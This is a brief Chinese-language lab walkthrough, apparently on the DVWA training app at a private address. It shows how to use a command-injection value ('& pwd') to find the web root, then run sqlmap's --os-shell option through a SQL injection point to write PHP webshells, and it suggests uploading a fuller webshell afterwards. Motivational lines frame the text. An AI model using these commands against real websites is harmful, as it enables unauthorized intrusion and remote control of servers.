当你的才华
还撑不起你的野心时
那你就应该静下心来学习
使用sqlmap进行交互式写shell:
1.打开http://10.1.1.136,输入用户名:admin 密码:password,登录
2.选择Command Execution,并输入:10.1.1.136 & pwd来获得一个绝对路径,
/opt/lampp/htdocs/vulnerabilities/exec
3.选择SQL Injection,输入一个数,使用burpsuite进行抓包,获取cookie。
判断用户是否为dba,输入命令:
sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --is-dba
4.接下来使用sqlmap进行交互式写shell
输入命令:
sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --os-shell
脚本类型为PHP,所以输入4
5.选择2,输入第二步得到的路径
6.成功写入2个shell,一个用来执行命令的,另一个是用来上传的,打开链接:http://10.1.1.136/vulnerabilities/exec/tmpujhum.php
7.接下来就是上传大马了。或者直接执行linux命令
注:使用sqlmap交互式写shell,只需知道网站绝对路径和一个注入点
我不需要自由,只想背着她的梦
一步步向前走,她给的永远不重